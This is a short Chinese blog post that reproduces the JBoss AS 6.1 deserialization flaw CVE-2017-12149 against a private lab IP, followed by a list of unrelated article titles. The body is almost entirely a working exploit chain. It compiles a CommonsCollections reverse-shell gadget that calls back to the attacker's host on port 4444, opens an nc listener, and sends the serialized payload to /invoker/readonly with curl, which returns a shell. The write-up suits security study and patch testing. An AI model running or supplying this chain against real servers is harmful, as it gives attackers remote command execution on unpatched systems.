JBOSS AS 5.X/6.X 反序列化漏洞(CVE-2017-12149)复现
2024-08-27 04:24:45
本机IP:192.168.220.145
靶机IP:192.168.220.139,版本为JBOSS AS 6.1.0 Final
首先访问目标地址,http://192.168.220.139:8080/invoker/readonly
返回500,一般存在
执行命令
┌─[root@sch01ar]─[~] └──╼ #cd /sch01ar/JavaDeserH2HC/ ┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC] └──╼ #javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java ┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC] └──╼ #java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.145:4444 Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser
生成了一个ReverseShellCommonsCollectionsHashMap.ser文件
用nc监听4444端口
┌─[✗]─[root@sch01ar]─[~] └──╼ #nc -vlp 4444
发送payload
┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC] └──╼ #curl http://192.168.220.139:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
nc成功返回shell
最新文章
- Zookeeper-Zookeeper启动过程
- 本机搭建zookeeper集群
- 微课程--Android--Android概述
- kafka模拟客户端发送、接受消息
- 要件审判九步法及其基本价值 z
- Android:PopupWindow简单弹窗改进版
- bnuoj 29368 Check the Identity(栈)
- 图片左右循环连续滚动代码,解决marquee的留白问题
- [转]Jquery中AJAX错误信息调试参考
- PHP学习(变量)
- [置顶] 如何使用c3p0+spring连接oracle数据库
- 应用facebook .net sdk
- 如何面试 PHP 工程师?
- Springboot整合activemq
- 008. 阻塞&;非阻塞、同步&;异步
- 小程序之 input框设置placeholder的style
- 使用vue-cli 引入bootstrap.min.css文件报错
- Yii2 查询构建器 QueryBuilder
- VUE温习:style层次分析
- (转)MySQL排序原理与案例分析